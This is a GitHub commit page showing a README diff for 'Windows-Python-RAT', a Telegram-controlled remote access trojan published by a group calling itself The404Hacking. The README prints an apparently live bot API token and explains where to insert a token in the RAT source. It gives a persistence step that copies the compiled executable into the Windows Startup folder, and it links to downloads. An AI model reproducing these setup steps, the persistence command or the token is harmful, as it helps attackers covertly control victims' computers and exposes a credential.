Skip to content

Commit a0ca63a

Browse files
Update README.md
1 parent 11c95f3 commit a0ca63a

1 file changed

Lines changed: 5 additions & 8 deletions

File tree

README.md

Lines changed: 5 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -12,14 +12,12 @@
1212

1313
-------------------------------
1414
# Robot for initial Windows-Python-RAT testing
15-
1615
Bot ID: [@W_P_RAT_Bot](https://t.me/W_P_RAT_Bot)
1716

1817
Token: `586363223:AAHSLdPnAE60avs_T25l_HjzRahtw6PhxDY`
1918

2019
-------------------------------
2120
# Set Bot API-Token
22-
2321
To replace your robot Token in RAT, simply go to Line 35 in the **Windows-Python-RAT.py** file and place your API-TOKEN instead of `TOKEN`.
2422

2523
In Line 35:
@@ -32,10 +30,9 @@ Example for Replace Token:
3230
![Replace Token](Token.png?raw=true "Replace Token")
3331
-------------------------------
3432
# StartUP Settings
33+
For startup settings, you must first write the name of your bot before compiling it in the **Windows-Python-RAT.py** file. For example, before compiling the RAT file, you need to go to line 281 and name it as an `YOUR-COMPILED-RAT-NAME.exe`.
3534

36-
For startup settings, you must first write the name of your bot before compiling it in the **Windows-Python-RAT.py** file. For example, before compiling the RAT file, you need to go to line 291 and name it as an `YOUR-COMPILED-RAT-NAME.exe`.
37-
38-
In Line 291:
35+
In Line 281:
3936
```python
4037
os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"')
4138
#replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe'
@@ -102,15 +99,15 @@ RAT Control Panel [@W_P_RAT_Bot](https://T.me/W_P_RAT_Bot):
10299

103100

104101

105-
## Download and Clone
102+
# Download and Clone
106103
> Download: Click [Here](https://github.com/The404Hacking/Windows-Python-RAT/archive/master.zip)
107104
108105
> Clone: git clone [https://github.com/The404Hacking/Windows-Python-RAT.git](https://github.com/The404Hacking/Windows-Python-RAT.git)
109106
110-
## The404Hacking | Digital UnderGround Team
107+
# The404Hacking | Digital UnderGround Team
111108
[The404Hacking](https://T.me/The404Hacking)
112109

113-
## Follow us !
110+
# Follow us !
114111
[The404Hacking](https://T.me/The404Hacking) - [The404Cracking](https://T.me/The404Cracking)
115112

116113
[Instagram](https://instagram.com/The404Hacking) - [GitHub](https://github.com/The404Hacking)

0 commit comments

Comments
 (0)